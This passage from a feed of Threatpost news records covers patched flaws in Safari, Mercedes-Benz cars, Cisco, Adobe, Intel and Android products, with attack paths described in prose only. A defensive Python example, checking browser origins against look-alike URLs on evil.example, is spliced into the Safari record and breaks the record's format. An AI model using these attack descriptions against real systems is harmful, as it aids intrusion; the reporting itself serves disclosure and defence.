bug-bounty program and have been patched \u2013 however, technical details of the flaws, including a proof of concept (PoC) attack, were kept under wraps until Pickren\u2019s recent disclosure.\n\n\u201cImagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed,\u201d said Pickren, in an [analysis of the vulnerabilities last week](<https://www.ryanpickren.com/webcam-hacking-overview>). 
\u201cThis vulnerability allowed malicious websites to masquerade as trusted websites when viewed on the desktop version of Safari (like on Mac computers) or mobile Safari (like on iPhones or iPads).\u201d\n\nWhile normally each app must be explicitly granted permission by the user to access a device\u2019s camera and microphone, Apple\u2019s own apps, including Safari, do not require it. Furthermore, new web technologies, including the MediaDevices Web API (an interface providing access to connected media input devices like cameras and microphones, as well as screen sharing), allow certain websites to use Safari\u2019s permissions to access the camera directly. Pickren said that this feature is \u201cgreat for web-based video-conferencing apps such as Skype or Zoom. But\u2026 this new web-based camera tech undermines the OS\u2019s native-camera security model.\u201d\n\nWith these issues in mind, Pickren discovered three vulnerabilities in the macOS and iOS versions of Safari 13.0.4 ([CVE-2020-3885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3885>), [CVE-2020-3887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3887>), [CVE-2020-9784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9784>)), which together gave him access to the webcam without the victim\u2019s permission.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/06133731/finaldiagram.png>)\n\nClick to Enlarge: Diagram of the attack. 
Credit: Ryan Pickren\n\nSpecifically, the flaws stem from a perfect storm of small errors in how Safari parses Uniform Resource Identifiers (including URLs/web addresses); manages web origins (origins are defined by the protocol and web domain used) and ports; and initializes secure contexts (a secure context is a window where content has been delivered securely via HTTPS/TLS).\n\nAn attacker could take advantage of these errors by creating a specially crafted URL that would utilize scripts embedded in a malicious site. The URL would be able to trick Safari into thinking an attacker-controlled website is in the \u201csecure context\u201d of a trusted website, such as Zoom or Skype. Safari would then give the attackers behind the link untethered permission to access the webcam via the MediaDevices Web API.\n\n\u201cIf a malicious website strung these issues together, it could use JavaScript to directly access the victim\u2019s webcam without asking for permission,\u201d he said in a [technical walk through](<https://www.ryanpickren.com/webcam-hacking>) of the attack. \u201cAny JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack.\u201d Once a user clicks on those website URLs, ad banners or extensions, the permissions to access their camera and microphone would be automatically granted to attackers.\n\nPickren said that he reported the seven flaws (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, and CVE-2020-9787) in December 2019 to Apple as part of their bug-bounty program (which was made [public to the research community](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) in December) \u2013 winning the researcher $75,000. 
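The origin mix-up described above turns on Safari treating an attacker-controlled page as if it were a trusted one. The Python below is an added example, not Pickren's proof of concept and not Apple's code: it contrasts a naive string test on a trusted site's name with a comparison of the full origin tuple (scheme, host, port), which is what a camera-permission decision has to key on. It assumes `zoom.us` as the trusted host (the article names Zoom only as an example of a site that is granted camera access), and the URLs are constructed test inputs shaped to look like that host.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Assumption for this example: the article calls Zoom a trusted site. The real
# allow-list lives in the browser and is not reproduced here.
TRUSTED_ORIGIN = ("https", "zoom.us", 443)


def origin_of(url):
    """Return the origin tuple (scheme, host, port) for a URL, or None.

    urlsplit().hostname drops userinfo ("zoom.us@evil.example" -> evil.example),
    lower-cases the host and strips IPv6 brackets; .port parses an explicit
    port, and a missing one is filled in from the scheme's default. Anything
    that is not a plain http/https URL with a host yields None, so the caller
    treats it as untrusted instead of guessing.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = parts.hostname
    if scheme not in DEFAULT_PORTS or not host:
        return None
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        return None
    return (scheme, host, port if port is not None else DEFAULT_PORTS[scheme])


def naive_allows_camera(url):
    """The pattern to avoid: a prefix test on the trusted site's name."""
    return url.startswith("https://zoom.us")


def strict_allows_camera(url):
    """Grant only when the whole origin tuple matches, never a substring of it."""
    return origin_of(url) == TRUSTED_ORIGIN


# Constructed probes: one genuine URL, the rest shaped to resemble the trusted host.
PROBES = [
    "https://zoom.us/j/123",            # the real site
    "https://zoom.us@evil.example/",    # userinfo: the host is evil.example
    "https://zoom.us.evil.example/",    # subdomain of an attacker's domain
    "https://zoom.us:8443/",            # same host, other port: a different origin
    "http://zoom.us/",                  # plain http is a different origin too
    "https://ZOOM.US/",                 # host names compare case-insensitively
]


def compare(urls=PROBES):
    """Return {url: (naive_decision, strict_decision)} for each probe."""
    return {u: (naive_allows_camera(u), strict_allows_camera(u)) for u in urls}


if __name__ == "__main__":
    for url, (naive, strict) in compare().items():
        print(f"{url:36} naive={naive!s:5} strict={strict}")
```

The naive check says yes to three of the five look-alikes; the tuple comparison says yes only to the genuine origin, and it is also the only one that accepts the upper-cased host, since origins are compared after normalisation rather than as raw strings.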
[The top reward](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>) in the \u201cNetwork Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data\u201d category, in which Pickren submitted his findings, is $500,000.\n\nApple patched the webcam vulnerabilities in a [January 28 update](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) (for Safari version 13.0.5) and the remaining four flaws were patched in [March](<https://support.apple.com/en-us/HT211102>). Threatpost has reached out to Apple for further comment.\n\nThe disclosure comes on the heels of a [separate report last week](<https://threatpost.com/two-zoom-zero-day-flaws-uncovered/154337/>) of two Zoom zero-day flaws in the macOS client version of the web conferencing platform. The Zoom vulnerabilities could give local, unprivileged attackers root privileges, and allow them to access victims\u2019 microphone and camera.\n", "cvss3": {}, "published": "2020-04-06T18:43:56", "type": "threatpost", "title": "Apple Safari Flaws Enable One-Click Webcam Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3852", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3885", "CVE-2020-3887", "CVE-2020-9784", "CVE-2020-9787"], "modified": "2020-04-06T18:43:56", "id": "THREATPOST:2334EE5F6C03FC3ECE377B9BD44BA4E7", "href": "https://threatpost.com/apple-safari-flaws-webcam-access/154476/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:38", "description": "The Mercedes-Benz E-Class went to market riddled with 19 vulnerabilities, which, among other things, could enable attackers to remotely unlock the car door and start its engine. Researchers say the flaws, detailed at Black Hat USA on Thursday, potentially impacted over 2 million Mercedes-Benz connected cars before they were fixed.\n\nThe E-Class is a range of executive cars manufactured by the German automaker, with in-vehicle infotainment systems and various connectivity functionalities. Researchers with the Sky-Go car threat research team, which is part of the security company 360 Group, initially reported the flaws to Mercedes-Benz on Aug. 21 of last year, and an initial fix was deployed on Aug. 26. The researchers have now publicly disclosed the vulnerabilities.\n\n\u201cWe reported the flaws to Mercedes-Benz, we found about 19 vulnerabilities,\u201d said Minrui Yan, head of the Sky-Go Team with 360 Group, presenting with Jiahao Li, researcher with 360 Group, at Black Hat. \u201cThe key impact is that we can send \u2018remote services\u2019 commands to the car. 
We did see many security considerations in the Mercedes-Benz.\u201d\n\n## **Connected Car Features**\n\nSecurity holes were discovered throughout the connectivity architecture of the vehicles.\n\nThe first part of this architecture is the \u201cHead-Unit,\u201d or the infotainment system. Researchers specifically looked at the infotainment system in the Mercedes-Benz E300L model, code-named NTG-55 and designed by Mitsubishi Electronics. The system features multimedia functions and also connects to the \u201cMercedes Me\u201d mobile application. This app allows users to monitor their vehicles in detail, including remotely starting, or locking and unlocking, their vehicle \u2014 or even noting how much fuel is in the tank. Researchers found one flaw in the Head-Unit, which has not yet been assigned a CVE.\n\nMeanwhile, the critical communication intermediary between the external network and the in-vehicle network is a Telematics Control Unit (TCU) called HERMES, short for Hardware for Enhanced Remote-, Mobility- & Emergency Services. Its functions include emergency and informational calls, and support for remote and local diagnosis, among others. It also contains a communication module that supports 3G and 4G networks, and can be set up with a short-range wireless network (Wi-Fi or Bluetooth) for the infotainment system. Researchers found six of the 19 flaws in the HERMES component (CVE-2019-19556, CVE-2019-19557, CVE-2019-19560, CVE-2019-19561, CVE-2019-19562 and CVE-2019-19563).\n\nOther flaws existed in the vehicle\u2019s back end (nine flaws, eight of which had no CVE assigned and the ninth tracked as CVE-2019-19558) and in the car\u2019s operations system (two flaws without CVEs assigned). 
Of note, in order to protect the intellectual property of Mercedes-Benz parent company Daimler, researchers disclosed only limited security designs and code details.\n\n## **The Impact**\n\nIn order to send remote-services commands, researchers probed the HERMES TCU of the car, which they say is the most crucial component in the whole system, since it houses the communication module that connects the in-vehicle infotainment network with the external network and the Mercedes Me app.\n\nTo inspect HERMES further, researchers needed physical access to the unit, since the firmware wasn\u2019t available from a vendor site or by proxying traffic. They removed the NAND flash chip holding the firmware with a ball-grid array (BGA) rework station and read it out in a socket they made themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/06152942/mercedes-benz.png>)\n\nResearchers then found that they were able to \u201ctamper with the file system by adding an interactive shell with root privileges. We found an engineer-mode program for debugging the TCU system, with access to the CAN bus via operating the MCU [a chip-level microcontroller],\u201d said researchers. \u201cThus, we can perform some operations for example, lock or unlock the doors.\u201d\n\nResearchers also found various other issues. For instance, the TCU file system stored the \u201cpkcs12\u201d client certificates, passwords and CA certificates for the car\u2019s back-end server, and researchers located the encrypted password files for the certificates, which carried the suffix \u201c.passwd.\u201d\n\n\u201cThe key of the certificate is encrypted to a file, so we can get the certificate key by compiling the decrypting tool with OpenSSL, obtaining the password of the certificate key. 
After decryption, the passwords of client certificate \u2026 can be obtained,\u201d they said.\n\nResearchers also found a server-side request forgery (SSRF) flaw on the back-end surface of the car\u2019s infotainment system, in a feature of the complementary web application that allows users to add their social-media accounts to the system: \u201cAn SSRF vulnerability occurred in the back-end service, as the image provider failed to filter the parameters we input,\u201d they explained. \u201cThe plugin developers have less consideration of the requested URL. For example, if we submit a local URL to the image provider, it\u2019ll return the contents we requested.\u201d\n\nAside from remote lock and start, the researchers were not able to reach any safety-critical functions of the vehicle, they said during their session. Guy Harpak, head of Product Security for Mercedes-Benz R&D, said Mercedes-Benz took several incident response (IR) steps after learning of the vulnerabilities. These include selectively blocking services and providing immediate fixes, launching forensic investigations and deploying more long-term fixes.\n\n\u201cWe have an example here of how a strong research community working with a strong industry can bring better security,\u201d Harpak said during the session.\n\nAs they become more connected, more and more vehicles are facing security holes. Previous researchers have discovered flaws in [car infotainment systems](<https://threatpost.com/connected-car-apps-open-privacy-hole-for-used-car-buyers/134549/>), as well as the wares of specific automakers like [Volkswagen](<https://threatpost.com/volkswagen-cars-open-to-remote-hacking-researchers-warn/131571/>), [Jeep](<https://threatpost.com/car-hacking-gets-the-attention-of-detroit-and-washington/113878/>) and more.\n", "cvss3": {}, "published": "2020-08-06T21:29:05", "type": "threatpost", "title": "Black Hat 2020: Mercedes-Benz E-Series Rife with 19 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19556", "CVE-2019-19557", "CVE-2019-19558", "CVE-2019-19560", "CVE-2019-19561", "CVE-2019-19562", "CVE-2019-19563", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-06T21:29:05", "id": "THREATPOST:50210848F5C0B6804DBF8A398FD41F24", "href": "https://threatpost.com/black-hat-19-flaws-connected-mercedes-benz-vehicles/158144/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:28", "description": "Cisco has hurried out a fix for a critical remote code-execution flaw in its customer interaction management solution, Cisco Unified Contact Center Express (CCX).\n\nCisco\u2019s Unified CCX software is touted as a \u201ccontact center in a box\u201d that allows companies to deploy customer-care applications. 
The flaw (CVE-2020-3280), which has a CVSS score of 9.8 out of 10, stems from the Java Remote Management Interface of the product.\n\n\u201cThe vulnerability is due to insecure deserialization of user-supplied content by the affected software,\u201d according to Cisco, in a [Wednesday security alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-rce-GMSC6RKN>). \u201cAn attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAn unauthenticated, remote attacker could exploit this flaw to execute arbitrary code on an affected device. Those who are using Cisco Unified CCX version 12.0 and earlier are urged to update to the fixed release, 12.0(1)ES03. Version 12.5 is not vulnerable, according to Cisco.\n\nCisco is not aware of any public announcements or malicious use of the flaw, according to the update. The tech giant on Wednesday also released a patch addressing [a high-severity flaw](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cpnr-dhcp-dos-BkEZfhLP>) (CVE-2020-3272) in its Prime Network Registrar, which enables dynamic host configuration protocol (DHCP) services (as well as DNS services).\n\nThe flaw stems from insufficient input validation of incoming DHCP traffic. It exists in the DHCP server and could enable an unauthenticated, remote attacker to trigger a denial of service (DoS) attack on an affected device.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device,\u201d according to Cisco. 
\u201cA successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition.\u201d\n\nAlso fixed were several medium-severity flaws, including a SQL injection flaw in Cisco\u2019s Prime Collaboration Provisioning Software (CVE-2020-3184), a DoS flaw in Cisco AMP for Endpoints Mac Connector Software (CVE-2020-3314) and memory buffer flaws (CVE-2020-3343, CVE-2020-3344) in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software.\n\nEarlier this month, Cisco also stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) affecting Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network-security devices. The flaws can be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-05-21T15:44:30", "type": "threatpost", "title": "Critical Cisco Bug in Unified CCX Allows Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3184", "CVE-2020-3272", "CVE-2020-3280", "CVE-2020-3314", "CVE-2020-3343", "CVE-2020-3344", "CVE-2020-5135"], "modified": "2020-05-21T15:44:30", "id": "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "href": "https://threatpost.com/critical-cisco-rce-flaw-unified-ccx/155980/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:21", "description": "Adobe has released patches for five critical vulnerabilities in Adobe Illustrator CC, its popular vector graphics editor, which if exploited could enable arbitrary code execution.\n\nOverall Adobe patched nine vulnerabilities as part of its regularly scheduled updates on Tuesday, including five critical ones in Adobe Illustrator CC, and four \u201cimportant\u201d and \u201cmoderate\u201d flaws in Adobe Experience Manager (AEM), its platform for integrated online marketing and web analytics.\n\n\u201cAdobe is not aware of any exploits in the wild for any of the issues addressed in these updates,\u201d according to [Adobe\u2019s security update](<https://helpx.adobe.com/security/products/illustrator/apsb20-03.html>).\n\nThe five critical flaws (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) are memory-corruption issues, in which the contents of a memory location are modified because of a programming error, ultimately enabling attackers to execute arbitrary code.\n\nThe bugs affect Illustrator CC 2019 for Windows, versions 24.0 and earlier. 
Adobe users are urged to update to version 24.0.2, in a \u201cpriority 3\u201d update. According to Adobe, a \u201cpriority 3\u201d update \u201cresolves vulnerabilities in a product that has historically not been a target for attackers. Adobe recommends administrators install the update at their discretion.\u201d\n\nHonggang Ren with Fortinet\u2019s FortiGuard Labs was credited with discovering the flaws. Threatpost has reached out to Fortinet for further technical details.\n\nAdobe also stomped out three \u201cimportant\u201d vulnerabilities and one \u201cmoderate\u201d flaw in AEM. All four flaws could enable sensitive information disclosure. The important-severity flaws include two reflected cross-site scripting glitches (CVE-2019-16466 and CVE-2019-16467) that impact AEM 6.3, 6.4 and 6.5. These flaws enable an attacker to use a web app to send malicious code to a victim.\n\nThe other important-severity flaw is an expression language injection flaw (CVE-2019-16469) affecting AEM 6.5. Expression language injection occurs when attacker-controlled data is entered into an expression language interpreter.\n\nFinally, a moderate-severity user interface injection flaw (CVE-2019-16468) was also fixed, which impacts AEM 6.3, 6.4 and 6.5. 
The AEM flaws are a \u201cpriority 2\u201d update, meaning they exist in \u201ca product that has historically been at elevated risk.\u201d AEM users can update to the fixed versions, listed below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/14094457/Screen-Shot-2020-01-14-at-9.09.15-AM.png>)\n\nThis month\u2019s Adobe update was light, particularly compared with [last month\u2019s December update](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>), when Adobe patched 25 CVEs overall across various products, including 17 critical vulnerabilities in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n", "cvss3": {}, "published": "2020-01-14T15:42:13", "type": "threatpost", "title": "Adobe Patches Five Critical Illustrator CC Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16466", "CVE-2019-16467", "CVE-2019-16468", "CVE-2019-16469", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3710", "CVE-2020-3711", "CVE-2020-3712", "CVE-2020-3713", "CVE-2020-3714"], "modified": "2020-01-14T15:42:13", "id": "THREATPOST:3DD752D9BB64796659DC752DBB658DF2", "href": "https://threatpost.com/adobe-patches-critical-illustrator-cc-flaws/151812/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:29:14", "description": "A critical security bug in the Intel Converged Security and Manageability Engine (CSME) could allow escalation of privilege, denial of service or information disclosure.\n\nThe details are included in a [bug advisory](<https://blogs.intel.com/technology/2019/11/ipas-november-2019-intel-platform-update-ipu/#gs.fm1dlz>) that in total covers 77 vulnerabilities, 67 of which were found by internal Intel staff. The silicon giant has rolled out firmware updates and software patches to address these, which range in severity from the one critical flaw to a low-severity local privilege-escalation issue.\n\nThe affected products are: Intel CSME, Intel Server Platform Services (SPS), Intel Trusted Execution Engine (TXE), Intel Active Management Technology (AMT), Intel Platform Trust Technology (PTT) and Intel Dynamic Application Loader (DAL).\n\nThe critical flaw is a heap overflow bug with a score of 9.6 out of 10 on the CVSS v.3 severity scale (CVE-2019-0169). 
It exists in the subsystem in the Intel CSME, which is a standalone chip on Intel CPUs that is used for remote management. The vulnerability could allow an unauthenticated user to enable escalation of privileges, information disclosure or denial of service via adjacent access.\n\n\u201cAdjacent access\u201d means that an attack must be launched from the same shared physical network or local IP subnet, or from within the same secure VPN or administrative network zone.\n\nAs for the other bugs, there\u2019s also a cross-site scripting (XSS) flaw rated as important (CVE-2019-11132). It exists in the subsystem of the Intel AMT and could allow a privileged user to enable privilege escalation via network access.\n\nIntel also fixed a slew of high-severity problems, including an insufficient access control issue (CVE-2019-11147) that could allow local privilege escalation by an authenticated user. It exists in the hardware abstraction driver for the MEInfo software for Intel CSME, TXEInfo software, and the INTEL-SA-00086 and INTEL-SA-00125 Detection Tools.\n\nOther high-severity bugs allow privilege escalation, including logic issues (CVE-2019-11105, CVE-2019-11131) in the subsystems for Intel CSME and Intel AMT; insufficient input validations (CVE-2019-11088, CVE-2019-11104) in the subsystem in Intel AMT, Intel TXE and the MEInfo software for Intel CSME; insufficient input validation for the firmware update software for Intel CSME (CVE-2019-11103); and improper directory permissions (CVE-2019-11097) in the installer for Intel Management Engine Consumer Driver for Windows and Intel TXE.\n\nRounding out the high-severity bugs is an insufficient input validation (CVE-2019-0131) in the subsystem in Intel AMT that could allow an unauthenticated user to carry out denial of service or information disclosure via adjacent access.\n\nIntel issued the update as part of its monthly security-fix cadence; it credited Daniel Moghimi and Berk Sunar from Worcester Polytechnic Institute, Thomas Eisenbarth from University of Lubeck, Nadia Heninger from University of California at San Diego, and Leon Nilges from n0xius and Jesse Michael from Eclypsium for uncovering 10 of the bugs.\n", "cvss3": {}, "published": "2019-11-12T19:07:34", "type": "threatpost", "title": "Intel Warns of Critical Info-Disclosure Bug in Security Engine", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0131", "CVE-2019-0169", "CVE-2019-11088", "CVE-2019-11097", "CVE-2019-11103", "CVE-2019-11104", "CVE-2019-11105", "CVE-2019-11131", "CVE-2019-11132", "CVE-2019-11147", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-12T19:07:34", "id": "THREATPOST:BBFD6EC28ECCF701431C5F4A518DC1B5", "href": "https://threatpost.com/intel-critical-info-disclosure-bug-security-engine/150124/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:02", "description": "Cisco is warning of several critical and high-severity flaws in its Data Center Network Manager (DCNM) for managing network platforms and switches.\n\nDCNM is a platform for managing Cisco data centers that run Cisco\u2019s NX-OS \u2014 the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches. 
The flaws exist in the REST API of DCNM \u2014 and the most serious of these could allow an unauthenticated, remote attacker to bypass authentication, and ultimately execute arbitrary actions with administrative privileges on a vulnerable device.\n\nThe critical flaw (CVE-2020-3382), which was found during internal security testing, rates 9.8 out of 10 on the CVSS scale, making it critical in severity. While the flaw is serious, the Cisco Product Security Incident Response Team said it is not aware of any public announcements or malicious exploits of the vulnerability.\n\n\u201cThe vulnerability exists because different installations share a static encryption key,\u201d said Cisco, [in a security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-bypass-dyEejUMs>) on Wednesday. \u201cAn attacker could exploit this vulnerability by using the static key to craft a valid session token. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges.\u201d\n\nThis vulnerability affects all deployment modes of all Cisco DCNM appliances that were installed using .ova or .iso installers, and affects Cisco DCNM software releases 11.0(1), 11.1(1), 11.2(1), and 11.3(1).\n\n\u201cCisco has confirmed that this vulnerability does not affect Cisco DCNM instances that were installed on customer-provided operating systems using the DCNM installer for Windows or Linux,\u201d said Cisco. 
\u201cCisco has also confirmed that this vulnerability does not affect Cisco DCNM software releases 7.x and 10.x.\u201d\n\nCisco has released software updates that address the vulnerability, though there are no workarounds that address the flaw.\n\nCisco also patched five high-severity flaws in DCNM, including two command-injection flaws ([CVE-2020-3377](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-devmgr-cmd-inj-Umc8RHNh>) and [CVE-2020-3384](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-rest-inj-BCt8pwAJ>)) that could allow an authenticated, remote attacker to inject arbitrary commands on affected devices; a path traversal issue ([CVE-2020-3383](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-path-trav-2xZOnJdR>)) that could enable an authenticated, remote attacker to conduct directory traversal attacks on vulnerable devices; an improper authorization flaw ([CVE-2020-3386](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-improper-auth-7Krd9TDT>)), allowing an authenticated, remote attacker with a low-privileged account to bypass authorization on the API of an affected device; and an authentication bypass glitch ([CVE-2020-3376](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-auth-bypass-JkubGpu3>)) allowing an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions on an affected device.\n\nDCNM came in the spotlight [earlier this year](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) when [three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) were discovered in the tool in January. 
Two critical flaws [were also found last year in DCNM,](<https://threatpost.com/cisco-warns-of-critical-flaws-in-data-center-network-manager/146050/>) which could allow attackers to take control of impacted systems.\n\nCisco on Wednesday [also patched a critical vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uabvman-SYGzt8Bv>) (CVE-2020-3374) in the web-based management interface of its SD-WAN vManage Network Management system (the centralized management platform). This flaw could allow a remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system \u2013 but the attacker would need to be authenticated to exploit the flaw.\n", "cvss3": {}, "published": "2020-07-30T14:36:36", "type": "threatpost", "title": "Critical, High-Severity Cisco Flaws Fixed in Data Center Network Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3374", "CVE-2020-3376", "CVE-2020-3377", "CVE-2020-3382", "CVE-2020-3383", "CVE-2020-3384", "CVE-2020-3386"], "modified": "2020-07-30T14:36:36", "id": "THREATPOST:5548F4E3E237D384BA67561D3FCBB730", "href": "https://threatpost.com/critical-high-severity-cisco-flaws-fixed-data-center-network-manager/157861/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:03", "description": "Critical flaws in Adobe\u2019s Magento e-commerce platform \u2013 which is commonly targeted by attackers like the [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could enable arbitrary code execution on affected systems.\n\nMagento is a popular, Adobe-owned open-source e-commerce platform that powers many online shops. Adobe on Tuesday released security updates for flaws affecting Magento Commerce 2 and Magento Open Source 2, versions 2.3.5-p1 and earlier. These included two critical vulnerabilities and two important-severity flaws.\n\n\u201cSuccessful exploitation could lead to arbitrary code execution and signature verification bypass,\u201d according to Adobe.\n\nThe critical flaws include a path traversal flaw (CVE-2020-9689) that could enable arbitrary code execution. Path traversal attacks essentially allow attackers to trick a web application into reading the files and directories that are stored outside the web root folder. 
Another critical vulnerability (CVE-2020-9692) is a security mitigation bypass, which could also allow arbitrary code execution. For both of these flaws, an attacker needs administrative privileges to exploit the vulnerability.\n\nAdobe also patched an important-severity observable timing discrepancy, which could enable signature verification bypass (CVE-2020-9690). [According to Mitre](<https://cwe.mitre.org/data/definitions/208.html>), an observable timing discrepancy is when two separate operations require different amounts of time to complete \u2013 in a way that is observable to an attacker \u2013 which reveals security-relevant information about the vulnerable product.\n\nFinally, an important-severity, DOM-based cross-site scripting issue could allow arbitrary code execution. An attacker would not need to be authenticated to abuse this flaw \u2013 meaning that it is exploitable without credentials.\n\nUsers are urged to update to Magento Commerce 2 versions 2.4.0 or 2.3.5-p2, and Magento Open Source 2 versions 2.4.0 or 2.3.5-p2. The update for all vulnerabilities is a priority 2, meaning they exist in a product that has historically been at elevated risk \u2013 but for which there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d said Adobe.\n\nMagento has had its share of security flaws over the past year. In April Adobe [patched several critical flaws](<https://helpx.adobe.com/security/products/magento/apsb20-22.html>) in Magento, which if exploited could lead to arbitrary code execution or information disclosure. The most serious of these include critical command injection flaws (CVE-2020-9576, CVE-2020-9578, CVE-2020-9582, CVE-2020-9583) and critical security mitigation bypass vulnerabilities (CVE-2020-9579, CVE-2020-9580). 
Adobe also issued patches in January as part of its overall release of the [Magento 2.3.4 upgrade](<https://magento.com/blog/magento-news/magento-2.3.4-building-more-engaging-customer-experiences>), giving the fixes a \u201cpriority 2\u201d rating.\n\nThe issue also comes after Magento 1 reached end-of-life (EOL) in June, with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2. E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n", "cvss3": {}, "published": "2020-07-29T21:22:00", "type": "threatpost", "title": "Critical Magento Flaws Allow Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-9576", "CVE-2020-9578", "CVE-2020-9579", "CVE-2020-9580", "CVE-2020-9582", "CVE-2020-9583", "CVE-2020-9689", "CVE-2020-9690", "CVE-2020-9692"], "modified": "2020-07-29T21:22:00", "id": "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "href": "https://threatpost.com/critical-magento-flaws-code-execution/157840/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:24:19", "description": "Google has released an update stomping out three critical-severity vulnerabilities in its Android operating system \u2014 one of which could result in \u201cpermanent denial of service\u201d on affected mobile devices if exploited.\n\nThe vulnerabilities are part of Google\u2019s December 2019 Android Security Bulletin, which deployed fixes for critical, high and medium-severity vulnerabilities tied to 15 CVEs overall. Qualcomm, whose chips are used in Android devices, also patched 22 critical and high-severity vulnerabilities.\n\n\u201cThe most severe of these issues is a critical security vulnerability in the Framework component that could enable a remote attacker using a specially crafted message to cause a permanent denial of service,\u201d according to Google\u2019s [Monday update](<https://source.android.com/security/bulletin/2019-12-01>). 
